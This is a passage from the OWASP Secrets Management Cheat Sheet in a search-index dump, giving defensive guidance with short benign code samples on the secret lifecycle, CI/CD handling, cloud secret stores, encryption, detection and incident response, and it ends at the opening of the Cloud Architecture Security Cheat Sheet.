Auditing is an essential part of secrets management due to the nature of the application. You must implement auditing securely to be resilient against attempts to tamper with or delete the audit logs. At a minimum, you should audit the following:

It is essential that all auditing has correct timestamps. Therefore, the secrets management solution should have proper time sync protocols set up on its supporting infrastructure. You should monitor the stack on which the solution runs for possible clock skew and manual time adjustments.

"},{"location":"cheatsheets/Secrets_Management_Cheat_Sheet.html#26-secret-lifecycle","title":"2.6 Secret Lifecycle","text":"

Secrets follow a lifecycle. The stages of the lifecycle are as follows:

"},{"location":"cheatsheets/Secrets_Management_Cheat_Sheet.html#261-creation","title":"2.6.1 Creation","text":"

New secrets must be securely generated and cryptographically robust enough for their purpose. Secrets must have the minimum privileges assigned to them to enable their required use/role.
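As a minimal sketch of secure generation (Python's standard secrets module is assumed; the lengths shown are illustrative choices, not requirements from this cheat sheet):

import secrets\n\n# 32 bytes (256 bits) from the OS CSPRNG, URL-safe base64 encoded\napi_token = secrets.token_urlsafe(32)\n\n# An 8-digit one-time code suitable for delivery over a side-channel\notp = ''.join(secrets.choice('0123456789') for _ in range(8))\n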

You should transmit credentials securely; ideally, you don't send the password along with the username when requesting user accounts. Instead, you should send the password via a secure channel (e.g. a mutually authenticated connection) or a side-channel such as a push notification, SMS, or email. Refer to the Multi-Factor Authentication Cheat Sheet to learn about the pros and cons of each channel.

Applications may not benefit from having multiple communication channels, so you must provision credentials securely.

See the Open CRE project on secrets lookup for more technical recommendations on secret creation.

"},{"location":"cheatsheets/Secrets_Management_Cheat_Sheet.html#262-rotation","title":"2.6.2 Rotation","text":"

You should regularly rotate secrets so that any stolen credentials will only work for a short time. Regular rotation will also reduce the tendency for users to fall back to bad habits such as re-using credentials.

Depending on a secret's function and what it protects, the lifetime could be from minutes (think end-to-end encrypted chats with perfect forward secrecy) to years (consider hardware secrets).

User credentials are an exception to regular rotation: following NIST recommendations, these should only be rotated if there is suspicion or evidence that they have been compromised.

"},{"location":"cheatsheets/Secrets_Management_Cheat_Sheet.html#263-revocation","title":"2.6.3 Revocation","text":"

When secrets are no longer required or potentially compromised, you must securely revoke them to restrict access. With (TLS) certificates, this also involves certificate revocation.

"},{"location":"cheatsheets/Secrets_Management_Cheat_Sheet.html#264-expiration","title":"2.6.4 Expiration","text":"

You should create secrets to expire after a defined time where possible. This expiration can either be active expiration by the secret-consuming system, or an expiration date set in the secrets management system that forces supporting processes to be triggered, resulting in a secret rotation. You should apply policies through the secrets management solution to ensure credentials are only made available for a limited time appropriate for the type of credentials. Applications should verify that the secret is still active before trusting it.

"},{"location":"cheatsheets/Secrets_Management_Cheat_Sheet.html#27-transport-layer-security-tls-everywhere","title":"2.7 Transport Layer Security (TLS) Everywhere","text":"

Never transmit secrets in plaintext. In this day and age, there is no excuse, given the ubiquitous adoption of TLS.

Furthermore, you can effectively use secrets management solutions to provision TLS certificates.

"},{"location":"cheatsheets/Secrets_Management_Cheat_Sheet.html#28-downtime-break-glass-backup-and-restore","title":"2.8 Downtime, Break-glass, Backup and Restore","text":"

Consider the possibility that a secrets management service becomes unavailable for various reasons, such as scheduled downtime for maintenance. It could be impossible to retrieve the credentials required to restore the service if you did not previously acquire them. Thus, choose maintenance windows carefully based on earlier metrics and audit logs.

Next, the backup and restore procedures of the system should be regularly tested and audited for their security. A few requirements apply to backup & restore. Ensure that:

Lastly, you should implement emergency (\"break-glass\") processes to restore the service if the system becomes unavailable for reasons other than regular maintenance. Therefore, emergency break-glass credentials should be regularly backed up securely in a secondary secrets management system and tested routinely to verify they work.

"},{"location":"cheatsheets/Secrets_Management_Cheat_Sheet.html#29-policies","title":"2.9 Policies","text":"

Consistently enforce policies defining the minimum complexity requirements of passwords and approved encryption algorithms at an organization-wide level. Using a centralized secrets management solution can help companies implement these policies.

Next, having an organization-wide secrets management policy can help enforce applying the best practices defined in this cheat sheet.

"},{"location":"cheatsheets/Secrets_Management_Cheat_Sheet.html#210-metadata-prepare-to-move-the-secret","title":"2.10 Metadata: prepare to move the secret","text":"

A secret management solution should provide the capability to store at least the following metadata about a secret:

Note: if you don't store metadata about the secret, nor prepare to move it, you will increase the probability of vendor lock-in.

"},{"location":"cheatsheets/Secrets_Management_Cheat_Sheet.html#3-continuous-integration-ci-and-continuous-deployment-cd","title":"3 Continuous Integration (CI) and Continuous Deployment (CD)","text":"

Building, testing and deploying changes generally requires access to many systems. Continuous Integration (CI) and Continuous Deployment (CD) tools typically store secrets to provide configuration to the application or during deployment. Alternatively, they interact heavily with the secrets management system. Various best practices can help smooth out secret management in CI/CD; we will deal with some of them in this section.

"},{"location":"cheatsheets/Secrets_Management_Cheat_Sheet.html#31-hardening-your-cicd-pipeline","title":"3.1 Hardening your CI/CD pipeline","text":"

CI/CD tooling consumes (high-privilege) credentials regularly. Ensure that the pipeline cannot be easily hacked or misused by employees. Here are a few guidelines which can help you:

"},{"location":"cheatsheets/Secrets_Management_Cheat_Sheet.html#32-where-should-a-secret-be","title":"3.2 Where should a secret be?","text":"

There are various places where you can store a secret to execute CI/CD actions:

Another alternative is to use the CI/CD pipeline to leverage the Encryption as a Service capability of the secrets management system to encrypt a secret. The CI/CD tooling can then commit the encrypted secret to git, where it can be fetched by the consuming service on deployment and decrypted again. See section 3.6 for more details.

Note: not all secrets need to pass through the CI/CD pipeline to reach the actual deployment. Instead, make sure that the deployed services take care of part of their secrets management during their own lifecycle (e.g. deployment, runtime, and destruction).

"},{"location":"cheatsheets/Secrets_Management_Cheat_Sheet.html#321-as-part-of-your-cicd-tooling","title":"3.2.1 As part of your CI/CD tooling","text":"

When secrets are part of your CI/CD tooling, it means that these secrets are exposed to your CI/CD jobs. CI/CD tooling can comprise, e.g., GitHub secrets, GitLab repository secrets, ENV Vars/Var Groups in Microsoft Azure DevOps, Kubernetes Secrets, etc. These secrets are often configurable/viewable by people who have the authorization to do so (e.g. a maintainer in GitHub, a project owner in GitLab, an admin in Jenkins, etc.), which leads to the following best practices:

"},{"location":"cheatsheets/Secrets_Management_Cheat_Sheet.html#322-storing-it-in-a-secrets-management-system","title":"3.2.2 Storing it in a secrets management system","text":"

Naturally, you can store secrets in a designated secrets management solution. For example, you can use a solution offered by your (cloud) infrastructure provider, such as AWS Secrets Manager, Google Secret Manager, or Azure Key Vault. You can find more information about these in section 4 of this cheat sheet. Another option is a dedicated secrets management system, such as HashiCorp Vault, Keeper, Confidant, or Conjur. Here are a few do's and don'ts for the CI/CD interaction with these systems. Make sure that the following is taken care of:

"},{"location":"cheatsheets/Secrets_Management_Cheat_Sheet.html#323-not-touched-by-cicd-at-all","title":"3.2.3 Not touched by CI/CD at all","text":"

Secrets do not necessarily need to be brought to the consumer of a secret by a CI/CD pipeline. It is even better when the consumer of the secret retrieves it itself. In that case, the CI/CD pipeline still needs to instruct the orchestrating system (e.g. Kubernetes) to schedule a specific service with a given service account with which the consumer can then retrieve the required secret. The CI/CD tooling then still has credentials for the orchestrating platform but no longer has access to the secrets themselves. The do's and don'ts regarding these credential types are similar to those described in section 3.2.2.
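For example, a consuming service running on Kubernetes could fetch its own secret at startup. The sketch below assumes HashiCorp Vault with its Kubernetes auth method and the hvac Python client; the role, paths, and Vault address are placeholders, and other secrets managers offer equivalent flows.

import hvac\n\n# The pod's projected service account token proves the workload's identity to Vault\njwt = open('/var/run/secrets/kubernetes.io/serviceaccount/token').read()\n\nclient = hvac.Client(url='https://vault.example.com')\nclient.auth.kubernetes.login(role='my-app', jwt=jwt)\n\n# Read the secret this service account is authorized for (KV v2 engine assumed)\nresponse = client.secrets.kv.v2.read_secret_version(path='my-app/database')\ndb_password = response['data']['data']['password']\n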

"},{"location":"cheatsheets/Secrets_Management_Cheat_Sheet.html#33-authentication-and-authorization-of-cicd-tooling","title":"3.3 Authentication and Authorization of CI/CD tooling","text":"

CI/CD tooling should have designated service accounts, which can only operate in the scope of the required secrets or the orchestration of the consumers of a secret. Additionally, a CI/CD pipeline run should be easily attributable to whoever defined the job or triggered it, so you can detect who has tried to exfiltrate or manipulate secrets. When you use certificate-based authentication, the identity of the pipeline caller should be part of the certificate. If you use a token to authenticate towards the mentioned systems, make sure you set the principal requesting these actions (e.g. the user or the job creator).

Periodically verify whether this is (still) the case for your system so that you can do logging, attribution, and security alerting on suspicious actions effectively.

"},{"location":"cheatsheets/Secrets_Management_Cheat_Sheet.html#34-logging-and-accounting","title":"3.4 Logging and Accounting","text":"

Attackers can use CI/CD tooling to extract secrets. They could, for example, use administrative interfaces or job creation that exfiltrates the secret using encryption or double base64 encoding. Therefore, you should log every action in a CI/CD tool. You should define security alerting rules for every non-standard manipulation of the pipeline tool and its administrative interface to monitor secret usage. Logs should be queryable for at least 90 days and stored for a more extended period in cold storage. It might take security teams time to understand how attackers can exfiltrate or manipulate a secret using CI/CD tooling.

"},{"location":"cheatsheets/Secrets_Management_Cheat_Sheet.html#35-rotation-vs-dynamic-creation","title":"3.5 Rotation vs Dynamic Creation","text":"

You can leverage CI/CD tooling to rotate secrets or to instruct other components to do the rotation of the secret. For instance, the CI/CD tool can request that a secrets management system or another application rotate a secret. Alternatively, the CI/CD tool or another component could set up a dynamic secret: a secret that exists only for as long as its consumer lives and is invalidated when the consumer no longer exists. This procedure reduces possible leakage of a secret and allows for easy detection of misuse: if an attacker uses the secret from anywhere other than the consumer's IP, you can easily detect it.
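As a hedged sketch of the dynamic-secret pattern, HashiCorp Vault's database secrets engine (via the hvac client) can mint short-lived database credentials per consumer; the role name, Vault address, and token source are placeholders:

import hvac\n\nclient = hvac.Client(url='https://vault.example.com', token='...')\n\n# Vault creates a fresh database user tied to a lease; it is revoked when the lease expires\ncreds = client.secrets.database.generate_credentials(name='readonly-role')\nusername = creds['data']['username']\npassword = creds['data']['password']\nlease_id = creds['lease_id']  # can be renewed, or revoked when the consumer goes away\n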

"},{"location":"cheatsheets/Secrets_Management_Cheat_Sheet.html#36-pipeline-created-secrets","title":"3.6 Pipeline Created Secrets","text":"

You can use pipeline tooling to generate secrets and either offer them directly to the service deployed by the tooling or provide the secret to a secrets management solution. Alternatively, the secret can be stored encrypted in git so that the secret and its metadata are as close to the developer's daily place of work as possible. A git-stored secret does require that developers cannot decrypt the secrets themselves and that every consumer of a secret has its own encrypted variant of the secret. For instance, the secret should be different per DTAP environment and encrypted with a different key. For each environment, only the designated consumer in that environment should be able to decrypt the specific secret. A secret does not leak cross-environment and can still be easily stored next to the code, as sketched below. Consumers of a secret could then decrypt the secret using a sidecar, as described in section 5.2. Instead of retrieving the secrets, the consumer would leverage the sidecar to decrypt the secret.
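A minimal sketch of the per-environment encryption idea, using Fernet from the Python cryptography package (key handling and names are illustrative; in practice each key would live only with that environment's consumer or its decrypting sidecar):

from cryptography.fernet import Fernet\n\n# One key per DTAP environment; generated and distributed out of band\nenv_keys = {'test': Fernet.generate_key(), 'production': Fernet.generate_key()}\n\nsecret = b'pipeline-generated-api-key'\n\n# Encrypt a separate variant per environment; only the ciphertexts are committed to git\nencrypted = {env: Fernet(key).encrypt(secret) for env, key in env_keys.items()}\n\n# Only the production consumer, holding env_keys['production'], can decrypt its variant\nplaintext = Fernet(env_keys['production']).decrypt(encrypted['production'])\n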

When a pipeline creates a secret by itself, ensure that the scripts or binaries involved adhere to best practices for secret generation, such as secure randomness and sufficient secret length, and that the secret is created based on well-defined metadata stored in git or elsewhere.

"},{"location":"cheatsheets/Secrets_Management_Cheat_Sheet.html#4-cloud-providers","title":"4 Cloud Providers","text":"

For cloud providers, there are at least four essential topics to touch upon:

"},{"location":"cheatsheets/Secrets_Management_Cheat_Sheet.html#41-services-to-use","title":"4.1 Services to Use","text":"

It is best to use a designated secret management solution in any environment. Most cloud providers have at least one service that offers secret management. Of course, it's also possible to run a different secret management solution (e.g. HashiCorp Vault or Conjur) on compute resources within the cloud. We'll consider cloud provider service offerings in this section.

Sometimes it's possible to automatically rotate your secret, either via a service provided by your cloud provider or via a (custom-built) function. Generally, you should prefer the cloud provider's solution, since the barrier of entry and risk of misconfiguration are lower. If you use a custom solution, ensure that the role the function uses for rotation can only be assumed by that function.

"},{"location":"cheatsheets/Secrets_Management_Cheat_Sheet.html#411-aws","title":"4.1.1 AWS","text":"

For AWS, the recommended solution is AWS Secrets Manager.

Permissions are granted at the secret level. Check out the Secrets Manager best practices.
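A minimal retrieval sketch using boto3 (secret name and region are placeholders; the calling role needs secretsmanager:GetSecretValue on that specific secret only):

import boto3\n\nclient = boto3.client('secretsmanager', region_name='eu-west-1')\n\n# IAM permissions are evaluated per secret, so scope the caller's policy to this secret only\nresponse = client.get_secret_value(SecretId='prod/my-app/db-password')\ndb_password = response['SecretString']\n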

It is also possible to use the Systems Manager Parameter Store, which is cheaper, but it has a few downsides:

"},{"location":"cheatsheets/Secrets_Management_Cheat_Sheet.html#4111-aws-nitro-enclaves","title":"4.1.1.1 AWS Nitro Enclaves","text":"

With AWS Nitro Enclaves, you can create trusted execution environments, so no human-based access is possible once the application is running. Additionally, enclaves do not have any permanent storage attached to them. Therefore, secrets and other sensitive data stored in Nitro Enclaves have an additional layer of security.

"},{"location":"cheatsheets/Secrets_Management_Cheat_Sheet.html#4112-aws-cloudhsm","title":"4.1.1.2 AWS CloudHSM","text":"

For secrets used in highly confidential applications, you may need more control over the encryption and storage of the keys. AWS offers CloudHSM, which lets you bring your own key (BYOK) for AWS services. Thus, you will have more control over keys' creation, lifecycle, and durability. CloudHSM allows automatic scaling and backup of your data. The cloud service provider, Amazon, will not have any access to the key material stored in CloudHSM.

"},{"location":"cheatsheets/Secrets_Management_Cheat_Sheet.html#412-gcp","title":"4.1.2 GCP","text":"

For GCP, the recommended service is Secret Manager.

Permissions are granted at the secret level.

Check out the Secret Manager best practices.

"},{"location":"cheatsheets/Secrets_Management_Cheat_Sheet.html#4121-google-cloud-confidential-computing","title":"4.1.2.1 Google Cloud Confidential Computing","text":"

GCP Confidential Computing allows encryption of data during runtime. Thus, application code and data are kept secret, encrypted, and cannot be accessed by humans or tools.

"},{"location":"cheatsheets/Secrets_Management_Cheat_Sheet.html#413-azure","title":"4.1.3 Azure","text":"

For Azure, the recommended service is Key Vault.

Contrary to other clouds, permissions are granted at the Key Vault level. This means secrets for separate workloads and separate sensitivity levels should be placed in separate Key Vaults accordingly.

Check out the Key Vault best practices.
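A minimal retrieval sketch with the azure-identity and azure-keyvault-secrets packages (the vault URL and secret name are placeholders); because access is granted per vault, each workload would point at its own dedicated vault:

from azure.identity import DefaultAzureCredential\nfrom azure.keyvault.secrets import SecretClient\n\n# A dedicated vault per workload/sensitivity level keeps access scoped\ncredential = DefaultAzureCredential()\nclient = SecretClient(vault_url='https://myapp-prod-kv.vault.azure.net', credential=credential)\n\ndb_password = client.get_secret('db-password').value\n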

"},{"location":"cheatsheets/Secrets_Management_Cheat_Sheet.html#4131-azure-confidential-computing","title":"4.1.3.1 Azure Confidential Computing","text":"

With Azure Confidential Computing, you can create trusted execution environments. Every application is executed in an encrypted enclave, so the data and code consumed by the application are protected end-to-end. Furthermore, any application running inside enclaves is not accessible by any tool or human.

"},{"location":"cheatsheets/Secrets_Management_Cheat_Sheet.html#4132-azure-dedicated-hsm","title":"4.1.3.2 Azure Dedicated HSM","text":"

For secrets being used in Azure environments and requiring special security considerations, Azure offers Azure Dedicated HSM. This allows you more control over the secrets stored on it, including enhanced administrative and cryptographic control. The cloud service provider, Microsoft, will not have any access to the key material stored in Azure Dedicated HSM.

"},{"location":"cheatsheets/Secrets_Management_Cheat_Sheet.html#414-other-clouds-multi-cloud-and-cloud-agnostic","title":"4.1.4 Other clouds, Multi-cloud, and Cloud agnostic","text":"

If you're using multiple cloud providers, you should consider using a cloud-agnostic secrets management solution. This will allow you to use the same solution across all your cloud providers (and possibly also on-premises) and avoids vendor lock-in with any specific cloud provider.

There are open source and commercial solutions available. Some examples are:

"},{"location":"cheatsheets/Secrets_Management_Cheat_Sheet.html#42-envelope-client-side-encryption","title":"4.2 Envelope & client-side encryption","text":"

This section will describe how a secret is encrypted and how you can manage the keys for that encryption in the cloud.

"},{"location":"cheatsheets/Secrets_Management_Cheat_Sheet.html#421-client-side-encryption-versus-server-side-encryption","title":"4.2.1 Client-side encryption versus server-side encryption","text":"

Server-side encryption of secrets ensures that the cloud provider takes care of encrypting the secret in storage. The secret is then safeguarded against compromise while at rest. Encryption at rest often does not require additional work other than selecting the key to encrypt it with (see section 4.2.2). However, when you submit the secret to another service, it will no longer be encrypted: it is decrypted before being shared with the intended service or human user.

Client-side encryption of secrets ensures that the secret remains encrypted until you actively decrypt it. This means it is only decrypted when it arrives at the consumer. You need a proper cryptosystem to cater for this. Think about mechanisms such as PGP with a safe configuration, or other more scalable and relatively easy-to-use systems. Client-side encryption can provide end-to-end encryption of the secret, from producer to consumer.

"},{"location":"cheatsheets/Secrets_Management_Cheat_Sheet.html#422-bring-your-own-key-versus-cloud-provider-key","title":"4.2.2 Bring Your Own Key versus Cloud Provider Key","text":"

When you encrypt a secret at rest, the question is: which key do you want to use? The less trust you have in the cloud provider, the more you will want to manage yourself.

Often, you can either encrypt a secret with a key managed at the secrets management service or use a key management solution from the cloud provider to encrypt the secret. The key offered through the cloud provider's key management solution can be managed either by the cloud provider or by yourself; industry standards call the latter \"bring your own key\" (BYOK). You can either import this key directly or generate it at the key management solution or in a cloud HSM supported by the cloud provider. You can then use either your key or the customer master key (CMK) from the provider to encrypt the data key of the secrets management solution. The data key, in turn, encrypts the secret. By managing the CMK, you have control over the data key at the secrets management solution.
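A hedged sketch of this envelope pattern with AWS KMS and the Python cryptography package (the KMS key alias is a placeholder; the same flow applies whether the CMK is provider-managed or imported via BYOK):

import os\nimport boto3\nfrom cryptography.hazmat.primitives.ciphers.aead import AESGCM\n\nkms = boto3.client('kms')\n\n# KMS returns a plaintext data key plus the same key wrapped under the CMK\ndata_key = kms.generate_data_key(KeyId='alias/secrets-master', KeySpec='AES_256')\n\n# Encrypt the secret locally with the data key, then discard the plaintext key\nnonce = os.urandom(12)\nciphertext = AESGCM(data_key['Plaintext']).encrypt(nonce, b'database password', None)\n\n# Persist only the ciphertext, nonce and wrapped key; KMS (and the CMK) is needed to unwrap it\nwrapped_key = data_key['CiphertextBlob']\n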

While importing your own key material is generally possible with all providers (AWS, Azure, GCP), it is not a recommended solution due to its complexity and difficulty of use, unless you know what you are doing and your threat model and policy require it.

"},{"location":"cheatsheets/Secrets_Management_Cheat_Sheet.html#43-identity-and-access-management-iam","title":"4.3 Identity and Access Management (IAM)","text":"

IAM applies to both on-premises and cloud setups: to effectively manage secrets, you need to set up suitable access policies and roles. Setting this up goes beyond policies regarding secrets; it should include hardening the full IAM setup, as it could otherwise allow for privilege escalation attacks. Ensure you never allow open \"pass role\" privileges or unrestricted IAM creation privileges, as these can be used to create or use credentials that have access to the secrets. Next, make sure you tightly control what can impersonate a service account: are your machines' roles accessible to an attacker exploiting your server? Can service roles from the data-pipeline tooling access the secrets easily? Ensure you include IAM for every cloud component in your threat model (e.g. ask yourself: how can you do elevation of privileges with this component?). See this blog entry for multiple do's and don'ts with examples.

Leverage the temporality of the IAM principals effectively: e.g. ensure that only specific roles and service accounts that require it can access the secrets. Monitor these accounts so that you can tell who or what used them to access the secrets.

Next, make sure that you scope access to your secrets: no principal should simply be allowed to access all secrets. In GCP and AWS, you can create fine-grained access policies to ensure that a principal cannot access all secrets at once. In Azure, having access to the Key Vault means having access to all secrets in that Key Vault. It is, thus, essential to have separate Key Vaults when working on Azure to segregate access.

"},{"location":"cheatsheets/Secrets_Management_Cheat_Sheet.html#44-api-limits","title":"4.4 API limits","text":"

Cloud services generally allow only a limited number of API calls over a given period. You could potentially (D)DoS yourself when you run into these limits. Most of these limits apply per account, project, or subscription, so spread workloads to limit your blast radius accordingly. Additionally, some services support data key caching, which reduces load on the key management service API (see, for example, AWS data key caching); some services, such as S3, can leverage built-in data key caching.

"},{"location":"cheatsheets/Secrets_Management_Cheat_Sheet.html#5-containers-orchestrators","title":"5 Containers & Orchestrators","text":"

You can enrich containers with secrets in multiple ways: at build time (not recommended) and during orchestration/deployment.

"},{"location":"cheatsheets/Secrets_Management_Cheat_Sheet.html#51-injection-of-secrets-file-in-memory","title":"5.1 Injection of Secrets (file, in-memory)","text":"

There are three ways to get secrets to an app inside a Docker container.

"},{"location":"cheatsheets/Secrets_Management_Cheat_Sheet.html#52-short-lived-side-car-containers","title":"5.2 Short Lived Side-car Containers","text":"

To inject secrets, you could create short-lived sidecar containers that fetch secrets from some remote endpoint and then store them on a shared volume mounted to the original container. The original container can then use the secrets from the mounted volume. The benefit of this approach is that you don't need to integrate any third-party tool or code to get secrets. Once the sidecar has fetched the secrets, it terminates. Examples of this include the Vault Agent Sidecar Injector and the Conjur Secrets Provider. By mounting secrets to a volume shared with the pod, containers within the pod can consume secrets without being aware of the secrets manager.

"},{"location":"cheatsheets/Secrets_Management_Cheat_Sheet.html#53-internal-vs-external-access","title":"5.3 Internal vs External Access","text":"

You should only expose secrets to communication mechanisms between the container and the deployment representation (e.g. a Kubernetes Pod). Never expose secrets through external access mechanisms shared among deployments or orchestrators (e.g. a shared volume).

When the orchestrator stores secrets (e.g. Kubernetes Secrets), make sure that the storage backend of the orchestrator is encrypted and you manage the keys well. See the Kubernetes Security Cheat Sheet for more information.

"},{"location":"cheatsheets/Secrets_Management_Cheat_Sheet.html#6-implementation-guidance","title":"6 Implementation Guidance","text":"

In this section, we will discuss implementation. Note that it is always best to refer to the official documentation of the secrets management system of choice for the actual implementation as it will be more up to date than any secondary document such as this cheat sheet.

"},{"location":"cheatsheets/Secrets_Management_Cheat_Sheet.html#61-key-material-management-policies","title":"6.1 Key Material Management Policies","text":"

Key material management is discussed in the Key Management Cheat Sheet.

"},{"location":"cheatsheets/Secrets_Management_Cheat_Sheet.html#62-dynamic-vs-static-use-cases","title":"6.2 Dynamic vs Static Use Cases","text":"

We see the following use cases for dynamic secrets, amongst others:

Note that these dynamic secrets often need to be created with the service we need to connect to. To create these types of dynamic secrets, we usually require long term static secrets to create the dynamic secrets themselves. Other static use cases:

"},{"location":"cheatsheets/Secrets_Management_Cheat_Sheet.html#63-ensure-limitations-are-in-place","title":"6.3 Ensure limitations are in place","text":"

Secrets should never be retrievable by everyone and everything. Always make sure that you put guardrails in place:

"},{"location":"cheatsheets/Secrets_Management_Cheat_Sheet.html#64-security-event-monitoring-is-key","title":"6.4 Security Event Monitoring is Key","text":"

Continually monitor who/what accesses the secret, from which IP, and with what methodology. There are various patterns you need to look out for, such as (but not limited to):

"},{"location":"cheatsheets/Secrets_Management_Cheat_Sheet.html#65-usability","title":"6.5 Usability","text":"

Ensure that your secrets management solution is easy to use, as you do not want people to work around it or use it ineffectively due to complexity. This usability requires:

"},{"location":"cheatsheets/Secrets_Management_Cheat_Sheet.html#7-encryption","title":"7 Encryption","text":"

Secrets Management goes hand in hand with encryption. After all, secrets must be stored encrypted somewhere to protect their confidentiality and integrity.

"},{"location":"cheatsheets/Secrets_Management_Cheat_Sheet.html#71-encryption-types-to-use","title":"7.1 Encryption Types to Use","text":"

You can use various encryption types to secure a secret as long as they provide sufficient security, including adequate resistance against quantum computing-based attacks. Given that this is a moving field, it is best to take a look at sources like keylength.com, which enumerate up-to-date recommendations on the usage of encryption types and key lengths for existing standards, as well as the NSA's Commercial National Security Algorithm Suite 2.0, which enumerates quantum-resistant algorithms.

Please note that in all cases, you should preferably select an algorithm that provides both confidentiality and authenticity (authenticated encryption), such as AES-256 using GCM (Galois/Counter Mode) or a combination of ChaCha20 and Poly1305, according to the best practices in the field.
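A minimal sketch of authenticated encryption with ChaCha20-Poly1305 using the Python cryptography package (AES-256-GCM works analogously via the AESGCM class):

import os\nfrom cryptography.hazmat.primitives.ciphers.aead import ChaCha20Poly1305\n\nkey = ChaCha20Poly1305.generate_key()  # 256-bit key\nnonce = os.urandom(12)  # must never be reused with the same key\n\n# AEAD: the ciphertext carries an authentication tag, so tampering fails decryption\nciphertext = ChaCha20Poly1305(key).encrypt(nonce, b'secret value', None)\nplaintext = ChaCha20Poly1305(key).decrypt(nonce, ciphertext, None)\n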

"},{"location":"cheatsheets/Secrets_Management_Cheat_Sheet.html#72-convergent-encryption","title":"7.2 Convergent Encryption","text":"

Convergent encryption ensures that a given plaintext and its key always result in the same ciphertext. This can help detect possible re-use of secrets, since re-used secrets produce the same ciphertext. The challenge with enabling convergent encryption is that it allows attackers to use the system to encrypt candidate strings and compare the resulting ciphertexts, potentially allowing them to derive the plaintext secret. Given the algorithm and key, you can mitigate this risk if the convergent cryptosystem you use imposes sufficient resource challenges during encryption. Another factor that can help reduce the risk is ensuring that a secret is of adequate length, further hampering the possible guess-iteration time required.

"},{"location":"cheatsheets/Secrets_Management_Cheat_Sheet.html#73-where-to-store-the-encryption-keys","title":"7.3 Where to store the Encryption Keys?","text":"

You should not store keys next to the secrets they encrypt, except if those keys are encrypted themselves (see envelope encryption). Start by consulting the Key Management Cheat Sheet on where and how to store the encryption and possible HMAC keys.

"},{"location":"cheatsheets/Secrets_Management_Cheat_Sheet.html#74-encryption-as-a-service-eaas","title":"7.4 Encryption as a Service (EaaS)","text":"

EaaS is a model in which users subscribe to a cloud-based encryption service without having to install encryption on their own systems. Using EaaS, you can get the following benefits:

"},{"location":"cheatsheets/Secrets_Management_Cheat_Sheet.html#8-detection","title":"8 Detection","text":"

There are many approaches to secrets detection and some very useful open source projects to help with this. The Yelp Detect Secrets project is mature and has signature matching for around 20 secrets. For more information on other tools to help you in the detection space, check out the Secrets Detection topic on GitHub.

"},{"location":"cheatsheets/Secrets_Management_Cheat_Sheet.html#81-general-detection-approaches","title":"8.1 General detection approaches","text":"

Shift-left and DevSecOps principles apply to secrets detection as well. These general approaches below aim to consider secrets earlier and evolve the practice over time.

"},{"location":"cheatsheets/Secrets_Management_Cheat_Sheet.html#82-types-of-secrets-to-be-detected","title":"8.2 Types of secrets to be detected","text":"

Many types of secrets exist, and you should consider signatures for each to ensure accurate detection for all. Among the more common types are:

For more fun learning about secrets and practice rooting them out, check out the Wrong Secrets project.

"},{"location":"cheatsheets/Secrets_Management_Cheat_Sheet.html#83-detection-lifecycle","title":"8.3 Detection lifecycle","text":"

Secrets are like any other authorization token. They should:

Create detection rules for each of the stages of the secret lifecycle.

"},{"location":"cheatsheets/Secrets_Management_Cheat_Sheet.html#84-documentation-for-how-to-detect-secrets","title":"8.4 Documentation for how to detect secrets","text":"

Create documentation and update it regularly to inform the developer community about the procedures and systems available at your organization, what types of secrets management you expect, how to test for secrets, and what to do in the event of detected secrets.

Documentation should:

"},{"location":"cheatsheets/Secrets_Management_Cheat_Sheet.html#9-incident-response","title":"9 Incident Response","text":"

Quick response in the event of a secret exposure is perhaps one of the most critical considerations for secrets management.

"},{"location":"cheatsheets/Secrets_Management_Cheat_Sheet.html#91-documentation","title":"9.1 Documentation","text":"

Incident response in the event of secret exposure should ensure that everyone in the chain of custody is aware and understands how to respond. This includes application creators (every member of a development team), information security, and technology leadership.

Documentation must include:

"},{"location":"cheatsheets/Secrets_Management_Cheat_Sheet.html#92-remediation","title":"9.2 Remediation","text":"

The primary goal of incident response is rapid response and containment.

Containment should follow these procedures:

  1. Revocation: Keys that were exposed should undergo immediate revocation. The secret must be able to be de-authorized quickly, and systems must be in place to identify the revocation status.
  2. Rotation: A new secret must be able to be quickly created and implemented, preferably via an automated process to ensure repeatability, low rate of implementation error, and least-privilege (not directly human-readable).
  3. Deletion: Secrets revoked/rotated must be removed from the exposed system immediately, including secrets discovered in code or logs. For secrets in code, the commit history could be squashed to a point before the secret was introduced; however, this may introduce other problems, as it rewrites git history and will break any other links to a given commit. If you decide to do this, be aware of the consequences and plan accordingly. Secrets in logs must have a process for removing the secret while maintaining log integrity.
  4. Logging: Incident response teams must have access to information about the lifecycle of a secret to aid in containment and remediation, including:
"},{"location":"cheatsheets/Secrets_Management_Cheat_Sheet.html#93-logging","title":"9.3 Logging","text":"

Additional considerations for logging of secrets usage should include:

Consider using a standardized logging format and vocabulary such as the Logging Vocabulary Cheat Sheet to ensure that all necessary information is logged.

"},{"location":"cheatsheets/Secrets_Management_Cheat_Sheet.html#10-related-cheat-sheets-further-reading","title":"10 Related Cheat Sheets & further reading","text":""},{"location":"cheatsheets/Secure_Cloud_Architecture_Cheat_Sheet.html","title":"Cloud Architecture Security Cheat Sheet","text":""},{"location":"cheatsheets/Secure_Cloud_Architecture_Cheat_Sheet.html#introduction","title":"Introduction","text":"

This cheat sheet will discuss common and necessary security patterns to follow when creating and reviewing cloud architectures. Each section will cover a specific security guideline or cloud design decision to consider. This sheet is written for a medium to large scale enterprise system, so additional overhead elements will be discussed, which may be unnecessary for smaller organizations.

"},{"location":"cheatsheets/Secure_Cloud_Architecture_Cheat_Sheet.html#risk-analysis-threat-modeling-and-attack-surface-assessments","title":"Risk Analysis, Threat Modeling, and Attack Surface Assessments","text":"

With any application architecture, understanding the risks and threats is extremely important for proper security. No one can spend their entire budget or bandwidth focused on security, so properly allocating security resources is necessary. Therefore, enterprises must perform risk assessments, threat modeling activities, and attack surface assessments to identify the following:

This is all necessary to properly scope the security of an architecture. However, these are subjects that can/should be discussed in greater detail. Use the resources link below to investigate further as part of a healthy secure architecture conversation.

"},{"location":"cheatsheets/Secure_Cloud_Architecture_Cheat_Sheet.html#public-and-private-components","title":"Public and Private Components","text":""},{"location":"cheatsheets/Secure_Cloud_Architecture_Cheat_Sheet.html#secure-object-storage","title":"Secure Object Storage","text":"

Object storage usually has the following options for accessing data:

"},{"location":"cheatsheets/Secure_Cloud_Architecture_Cheat_Sheet.html#iam-access","title":"IAM Access","text":"

